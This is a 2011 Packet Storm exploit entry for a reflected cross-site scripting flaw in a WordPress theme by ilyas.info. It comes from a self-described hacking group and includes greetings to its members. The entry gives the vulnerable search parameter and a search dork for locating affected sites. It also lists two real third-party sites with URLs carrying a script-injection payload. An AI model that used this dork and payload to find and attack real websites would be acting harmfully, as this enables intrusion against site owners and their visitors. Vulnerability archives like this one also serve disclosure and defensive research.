Ilyas.info Design Cross Site Scripting

2011-11-03T00:00:00
ID PACKETSTORM:106558
Type packetstorm
Reporter 3spi0n
Modified 2011-11-03T00:00:00

Description

                                        
                                            `# Exploit Title: Ilyas.info Design Cross Site Scripting Vulnerability  
[WordPress Themes]  
# Date: 30/10/2011 - 23:00  
# Author: 3spi0n  
# Software Website: http://ilyas.info/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable File: ?s=  
  
[$] Dorks: "Theme by Dizayn ilyas.info"  
  
[$] Demo Sites:  
  
[~] http://www.elektrikdelisi.com/?s="><script>alert("3spi0n")</script>  
[XSS]  
[~] http://www.degirmenmakinalari.com/?s="><script>alert("3spi0n")</script>  
[XSS]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# We attempted to work, you can not imagine.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Http://3spi0n.Net/  
  
# Greetz: Http://DarkDevilz.in/  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader  
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`